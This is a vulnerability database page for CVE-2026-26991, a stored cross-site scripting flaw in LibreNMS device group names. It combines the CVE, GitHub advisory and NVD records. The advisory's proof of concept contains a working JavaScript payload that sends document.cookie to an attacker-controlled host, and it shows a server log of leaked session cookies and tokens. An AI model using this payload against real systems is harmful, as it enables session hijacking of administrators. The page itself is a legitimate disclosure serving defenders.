Vulnerability-Lookup

CVE-2026-26991 (GCVE-0-2026-26991)

Vulnerability from cvelistv5 – Published: 2026-02-20 02:21 – Updated: 2026-02-20 16:35

Title

LibreNMS vulnerable to Stored Cross-site Scripting through unsanitized /device-groups name

Summary

LibreNMS is an auto-discovering PHP/MySQL/SNMP based network monitoring tool. In versions 26.1.1 and below, the device group name is not sanitized, allowing attackers with admin privileges to perform Stored Cross-Site Scripting (XSS) attacks. When a user adds a device group, an HTTP POST request is sent to the Request-URI "/device-groups". The name of the newly created device group is stored in the value of the name parameter. After the device group is created, the entry is displayed along with relevant buttons such as Rediscover Devices, Edit, and Delete. This issue has been fixed in version 26.2.0.

Severity ?

5.1 (Medium)


                        
                          CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N

CWE

CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Assigner

GitHub_M

References

URL

Tags

	https://github.com/librenms/librenms/security/adv…	x_refsource_CONFIRM
	https://github.com/librenms/librenms/pull/19041	x_refsource_MISC
	https://github.com/librenms/librenms/commit/64b31…	x_refsource_MISC
	https://github.com/librenms/librenms/releases/tag…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	librenms	librenms	Affected: < 26.2.0

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-26991",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-02-20T16:32:06.171996Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-02-20T16:35:40.195Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "librenms",
          "vendor": "librenms",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 26.2.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "LibreNMS is an auto-discovering PHP/MySQL/SNMP based network monitoring tool. In versions 26.1.1 and below, the device group name is not sanitized, allowing attackers with admin privileges to perform Stored Cross-Site Scripting (XSS) attacks. When a user adds a device group, an HTTP POST request is sent to the Request-URI \"/device-groups\". The name of the newly created device group is stored in the value of the name parameter. After the device group is created, the entry is displayed along with relevant buttons such as Rediscover Devices, Edit, and Delete. This issue has been fixed in version 26.2.0."
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "attackVector": "NETWORK",
            "baseScore": 5.1,
            "baseSeverity": "MEDIUM",
            "privilegesRequired": "LOW",
            "subAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "LOW",
            "subIntegrityImpact": "LOW",
            "userInteraction": "PASSIVE",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N",
            "version": "4.0",
            "vulnAvailabilityImpact": "NONE",
            "vulnConfidentialityImpact": "LOW",
            "vulnIntegrityImpact": "LOW"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-79",
              "description": "CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-02-20T02:21:31.889Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/librenms/librenms/security/advisories/GHSA-5pqf-54qp-32wx",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/librenms/librenms/security/advisories/GHSA-5pqf-54qp-32wx"
        },
        {
          "name": "https://github.com/librenms/librenms/pull/19041",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/librenms/librenms/pull/19041"
        },
        {
          "name": "https://github.com/librenms/librenms/commit/64b31da444369213eb4559ec1c304ebfaa0ba12c",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/librenms/librenms/commit/64b31da444369213eb4559ec1c304ebfaa0ba12c"
        },
        {
          "name": "https://github.com/librenms/librenms/releases/tag/26.2.0",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/librenms/librenms/releases/tag/26.2.0"
        }
      ],
      "source": {
        "advisory": "GHSA-5pqf-54qp-32wx",
        "discovery": "UNKNOWN"
      },
      "title": "LibreNMS vulnerable to Stored Cross-site Scripting through unsanitized /device-groups name"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-26991",
    "datePublished": "2026-02-20T02:21:31.889Z",
    "dateReserved": "2026-02-17T01:41:24.606Z",
    "dateUpdated": "2026-02-20T16:35:40.195Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-26991\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"none\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-02-20T16:32:06.171996Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-02-20T16:35:34.609Z\"}}], \"cna\": {\"title\": \"LibreNMS vulnerable to Stored Cross-site Scripting through unsanitized /device-groups name\", \"source\": {\"advisory\": \"GHSA-5pqf-54qp-32wx\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV4_0\": {\"version\": \"4.0\", \"baseScore\": 5.1, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N\", \"userInteraction\": \"PASSIVE\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"NONE\", \"privilegesRequired\": \"LOW\", \"subIntegrityImpact\": \"LOW\", \"vulnIntegrityImpact\": \"LOW\", \"subAvailabilityImpact\": \"NONE\", \"vulnAvailabilityImpact\": \"NONE\", \"subConfidentialityImpact\": \"LOW\", \"vulnConfidentialityImpact\": \"LOW\"}}], \"affected\": [{\"vendor\": \"librenms\", \"product\": \"librenms\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 26.2.0\"}]}], \"references\": [{\"url\": \"https://github.com/librenms/librenms/security/advisories/GHSA-5pqf-54qp-32wx\", \"name\": \"https://github.com/librenms/librenms/security/advisories/GHSA-5pqf-54qp-32wx\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/librenms/librenms/pull/19041\", \"name\": \"https://github.com/librenms/librenms/pull/19041\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/librenms/librenms/commit/64b31da444369213eb4559ec1c304ebfaa0ba12c\", \"name\": \"https://github.com/librenms/librenms/commit/64b31da444369213eb4559ec1c304ebfaa0ba12c\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/librenms/librenms/releases/tag/26.2.0\", \"name\": \"https://github.com/librenms/librenms/releases/tag/26.2.0\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"LibreNMS is an auto-discovering PHP/MySQL/SNMP based network monitoring tool. In versions 26.1.1 and below, the device group name is not sanitized, allowing attackers with admin privileges to perform Stored Cross-Site Scripting (XSS) attacks. When a user adds a device group, an HTTP POST request is sent to the Request-URI \\\"/device-groups\\\". The name of the newly created device group is stored in the value of the name parameter. After the device group is created, the entry is displayed along with relevant buttons such as Rediscover Devices, Edit, and Delete. This issue has been fixed in version 26.2.0.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-79\", \"description\": \"CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-02-20T02:21:31.889Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-26991\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-02-20T16:35:40.195Z\", \"dateReserved\": \"2026-02-17T01:41:24.606Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-02-20T02:21:31.889Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

GHSA-5PQF-54QP-32WX

Vulnerability from github – Published: 2026-02-18 22:07 – Updated: 2026-02-20 16:51

Summary

LibreNMS /device-groups name Stored Cross-Site Scripting

Details

Summary

/device-groups name Stored Cross-Site Scripting - HTTP POST - Request-URI(s): "/device-groups" - Vulnerable parameter(s): "name" - Attacker must be authenticated with "admin" privileges. - When a user adds a device group, an HTTP POST request is sent to the Request-URI "/device-groups". The name of the newly created device group is stored in the value of the name parameter. - After the device group is created, the entry is displayed along with some relevant buttons like Rediscover Devices, Edit, and Delete.

Details

The vulnerability exists as the name of the device group is not sanitized of HTML/JavaScript-related characters or strings. When the delete button is rendered, the following template is used to render the page:

resources/views/device-group/index.blade.php:

@section('title', __('Device Groups'))
@section('content')
<div class="container-fluid">
<x-panel id="manage-device-groups-panel">
// [...Truncated...]
@foreach($device_groups as $device_group)
// [...Truncated...]

<button type="button" class="btn btn-danger btn-
sm" title="{{ __('delete Device Group') }}" aria-label="{{ __('Delete') }}"
onclick="delete_dg(this, '{{$device_group->name }}', '{{ route('device-groups.destroy', $device_group->id)
}}')"> // using the device's name in the Delete button functionality without
sanitizing for XSS related characters/strings

As the device's name is not sanitized of HTML/JavaScript-related characters or strings, this can result in stored cross-site scripting.

PoC

Login
Select Devices > Manage Groups
Select New Device Group
Input 12345');var pt=new Image();pt.src='http:///cookie-
'.concat(document.cookie);document.body.appendChild(pt);delete_dg(this, '12345 into
the "Name" input box (change to be an the IP of an attacker controlled webserver)
Select "access_points.accesspoint_id" as the Conditional input
Input 1 into the Conditional value input box
Select Save
Select the Delete Icon for the newly created Device Group
Select OK
The JavaScript payload is not sanitized and an HTTP request will be sent to the attacker controlled
server, leaking the user's cookies.

Impact

Attacker Controlled server's logs:

192.168.1.96 - - [10/Feb/2026:13:32:25 -0600] "GET /cookie-
jqCookieJar_options=%7B%7D;%20SWIFT_cookieconsent=dismiss;%20CookieAuth=%5B%22emai

l%40email.c.com%22%2C%22%242y%2410%24zI.%5C%2F5BHghPssddSOjH6.Eek%5C%2F0hQNm8DewYh

LnQxXHlpw3abw4C74y%22%5D;%20XSRF-
TOKEN=eyJpdiI6InkrSlpHNFZ3TjRXbXl5clQ2ZVBHOFE9PSIsInZhbHVlIjoiZTROUHRCcGhYRGU4dVJL

Z2RUUTZ5VXlGZElMNjZoT0E2cGRNZzVDRmtVWTg5YTBGNzdpTU83YU1EZ3E3Tk1BTm5tNjYxTExUV1Z0Mj
BLNUlqOVl4MlpGL21xdHh3MUJwYm1zT1RaQXJwR0w5YmVXTkdKQWNXUkNvL1J2SzVtcWMiLCJtYWMiOiI0
ZTc4YjVmMjhiYjc3YTA2MDI5NjJkOTgzMTJlYmVkNGVhOTg0ZjE4ZjRlMzY1NmFlMjNiNmUyNzhlN2QwOG
I4IiwidGFnIjoiIn0%3D HTTP/1.1" 404 492 "http://192.168.1.121/" "Mozilla/5.0
(Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/144.0.0.0 Safari/537.36"

Severity ?

5.1 (Medium)


                  
                    CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "librenms/librenms"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "26.2.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-26991"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-18T22:07:19Z",
    "nvd_published_at": "2026-02-20T03:15:59Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\n**/device-groups name Stored Cross-Site Scripting**\n- HTTP POST\n- Request-URI(s): \"/device-groups\"\n- Vulnerable parameter(s): \"name\"\n- Attacker must be authenticated with \"admin\" privileges.\n- When a user adds a device group, an HTTP POST request is sent to the Request-URI \"/device-groups\". The name of the newly created device group is stored in the value of the name parameter.\n- After the device group is created, the entry is displayed along with some relevant buttons like Rediscover Devices, Edit, and Delete.\n\n### Details\nThe vulnerability exists as the name of the device group is not sanitized of HTML/JavaScript-related characters\nor strings. When the delete button is rendered, the following template is used to render the page:\n\n_resources/views/device-group/index.blade.php:_\n```\n@section(\u0027title\u0027, __(\u0027Device Groups\u0027))\n@section(\u0027content\u0027)\n\u003cdiv class=\"container-fluid\"\u003e\n\u003cx-panel id=\"manage-device-groups-panel\"\u003e\n// [...Truncated...]\n@foreach($device_groups as $device_group)\n// [...Truncated...]\n\n\u003cbutton type=\"button\" class=\"btn btn-danger btn-\nsm\" title=\"{{ __(\u0027delete Device Group\u0027) }}\" aria-label=\"{{ __(\u0027Delete\u0027) }}\"\nonclick=\"delete_dg(this, \u0027{{$device_group-\u003ename }}\u0027, \u0027{{ route(\u0027device-groups.destroy\u0027, $device_group-\u003eid)\n}}\u0027)\"\u003e // using the device\u0027s name in the Delete button functionality without\nsanitizing for XSS related characters/strings\n```\n\nAs the device\u0027s name is not sanitized of HTML/JavaScript-related characters or strings, this can result in stored\ncross-site scripting.\n\n### PoC\n- Login\n- Select Devices \u003e Manage Groups\n- Select New Device Group\n- Input 12345\u0027);var pt=new Image();pt.src=\u0027http://\u003cATTACKER_IP\u003e/cookie-\n- \u0027.concat(document.cookie);document.body.appendChild(pt);delete_dg(this, \u002712345 into\n- the \"Name\" input box (change \u003cATTACKER_IP\u003e to be an the IP of an attacker controlled webserver)\n- Select \"access_points.accesspoint_id\" as the Conditional input\n- Input 1 into the Conditional value input box\n- Select Save\n- Select the Delete Icon for the newly created Device Group\n- Select OK\n- The JavaScript payload is not sanitized and an HTTP request will be sent to the attacker controlled\n- server, leaking the user\u0027s cookies.\n\n### Impact\nAttacker Controlled server\u0027s logs:\n```\n192.168.1.96 - - [10/Feb/2026:13:32:25 -0600] \"GET /cookie-\njqCookieJar_options=%7B%7D;%20SWIFT_cookieconsent=dismiss;%20CookieAuth=%5B%22emai\n\nl%40email.c.com%22%2C%22%242y%2410%24zI.%5C%2F5BHghPssddSOjH6.Eek%5C%2F0hQNm8DewYh\n\nLnQxXHlpw3abw4C74y%22%5D;%20XSRF-\nTOKEN=eyJpdiI6InkrSlpHNFZ3TjRXbXl5clQ2ZVBHOFE9PSIsInZhbHVlIjoiZTROUHRCcGhYRGU4dVJL\n\nZ2RUUTZ5VXlGZElMNjZoT0E2cGRNZzVDRmtVWTg5YTBGNzdpTU83YU1EZ3E3Tk1BTm5tNjYxTExUV1Z0Mj\nBLNUlqOVl4MlpGL21xdHh3MUJwYm1zT1RaQXJwR0w5YmVXTkdKQWNXUkNvL1J2SzVtcWMiLCJtYWMiOiI0\nZTc4YjVmMjhiYjc3YTA2MDI5NjJkOTgzMTJlYmVkNGVhOTg0ZjE4ZjRlMzY1NmFlMjNiNmUyNzhlN2QwOG\nI4IiwidGFnIjoiIn0%3D HTTP/1.1\" 404 492 \"http://192.168.1.121/\" \"Mozilla/5.0\n(Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)\nChrome/144.0.0.0 Safari/537.36\"\n```",
  "id": "GHSA-5pqf-54qp-32wx",
  "modified": "2026-02-20T16:51:51Z",
  "published": "2026-02-18T22:07:19Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/librenms/librenms/security/advisories/GHSA-5pqf-54qp-32wx"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26991"
    },
    {
      "type": "WEB",
      "url": "https://github.com/librenms/librenms/pull/19041"
    },
    {
      "type": "WEB",
      "url": "https://github.com/librenms/librenms/commit/64b31da444369213eb4559ec1c304ebfaa0ba12c"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/librenms/librenms"
    },
    {
      "type": "WEB",
      "url": "https://github.com/librenms/librenms/releases/tag/26.2.0"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "LibreNMS /device-groups name Stored Cross-Site Scripting"
}

FKIE_CVE-2026-26991

Vulnerability from fkie_nvd - Published: 2026-02-20 03:15 - Updated: 2026-02-20 16:21

Severity ?

4.8 (Medium) - CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N

Summary

References

URL	Tags
security-advisories@github.com	https://github.com/librenms/librenms/commit/64b31da444369213eb4559ec1c304ebfaa0ba12c	Patch
security-advisories@github.com	https://github.com/librenms/librenms/pull/19041	Issue Tracking
security-advisories@github.com	https://github.com/librenms/librenms/releases/tag/26.2.0	Product, Release Notes
security-advisories@github.com	https://github.com/librenms/librenms/security/advisories/GHSA-5pqf-54qp-32wx	Exploit, Third Party Advisory

Impacted products

	Vendor	Product	Version
	librenms	librenms	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:librenms:librenms:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "C0838E1C-0369-4B31-9B51-83A5D2A7CAC9",
              "versionEndExcluding": "26.2.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "LibreNMS is an auto-discovering PHP/MySQL/SNMP based network monitoring tool. In versions 26.1.1 and below, the device group name is not sanitized, allowing attackers with admin privileges to perform Stored Cross-Site Scripting (XSS) attacks. When a user adds a device group, an HTTP POST request is sent to the Request-URI \"/device-groups\". The name of the newly created device group is stored in the value of the name parameter. After the device group is created, the entry is displayed along with relevant buttons such as Rediscover Devices, Edit, and Delete. This issue has been fixed in version 26.2.0."
    },
    {
      "lang": "es",
      "value": "LibreNMS es una herramienta de monitorizaci\u00f3n de red basada en PHP/MySQL/SNMP con descubrimiento autom\u00e1tico. En las versiones 26.1.1 y anteriores, el nombre del grupo de dispositivos no est\u00e1 saneado, permitiendo a atacantes con privilegios de administrador realizar ataques de Cross-Site Scripting (XSS) almacenado. Cuando un usuario a\u00f1ade un grupo de dispositivos, se env\u00eda una solicitud HTTP POST a la Request-URI \u0027/device-groups\u0027. El nombre del grupo de dispositivos reci\u00e9n creado se almacena en el valor del par\u00e1metro name. Despu\u00e9s de que se cree el grupo de dispositivos, la entrada se muestra junto con botones relevantes como Rediscover Devices, Edit y Delete. Este problema ha sido solucionado en la versi\u00f3n 26.2.0."
    }
  ],
  "id": "CVE-2026-26991",
  "lastModified": "2026-02-20T16:21:10.527",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 4.8,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "LOW",
          "integrityImpact": "LOW",
          "privilegesRequired": "HIGH",
          "scope": "CHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 1.7,
        "impactScore": 2.7,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ],
    "cvssMetricV40": [
      {
        "cvssData": {
          "Automatable": "NOT_DEFINED",
          "Recovery": "NOT_DEFINED",
          "Safety": "NOT_DEFINED",
          "attackComplexity": "LOW",
          "attackRequirements": "NONE",
          "attackVector": "NETWORK",
          "availabilityRequirement": "NOT_DEFINED",
          "baseScore": 5.1,
          "baseSeverity": "MEDIUM",
          "confidentialityRequirement": "NOT_DEFINED",
          "exploitMaturity": "NOT_DEFINED",
          "integrityRequirement": "NOT_DEFINED",
          "modifiedAttackComplexity": "NOT_DEFINED",
          "modifiedAttackRequirements": "NOT_DEFINED",
          "modifiedAttackVector": "NOT_DEFINED",
          "modifiedPrivilegesRequired": "NOT_DEFINED",
          "modifiedSubAvailabilityImpact": "NOT_DEFINED",
          "modifiedSubConfidentialityImpact": "NOT_DEFINED",
          "modifiedSubIntegrityImpact": "NOT_DEFINED",
          "modifiedUserInteraction": "NOT_DEFINED",
          "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
          "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
          "modifiedVulnIntegrityImpact": "NOT_DEFINED",
          "privilegesRequired": "LOW",
          "providerUrgency": "NOT_DEFINED",
          "subAvailabilityImpact": "NONE",
          "subConfidentialityImpact": "LOW",
          "subIntegrityImpact": "LOW",
          "userInteraction": "PASSIVE",
          "valueDensity": "NOT_DEFINED",
          "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
          "version": "4.0",
          "vulnAvailabilityImpact": "NONE",
          "vulnConfidentialityImpact": "LOW",
          "vulnIntegrityImpact": "LOW",
          "vulnerabilityResponseEffort": "NOT_DEFINED"
        },
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-02-20T03:15:59.977",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/librenms/librenms/commit/64b31da444369213eb4559ec1c304ebfaa0ba12c"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Issue Tracking"
      ],
      "url": "https://github.com/librenms/librenms/pull/19041"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Product",
        "Release Notes"
      ],
      "url": "https://github.com/librenms/librenms/releases/tag/26.2.0"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Third Party Advisory"
      ],
      "url": "https://github.com/librenms/librenms/security/advisories/GHSA-5pqf-54qp-32wx"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-79"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-26991 (GCVE-0-2026-26991)

GHSA-5PQF-54QP-32WX

Summary

Details

PoC

Impact

FKIE_CVE-2026-26991

Tags

Sightings

Nomenclature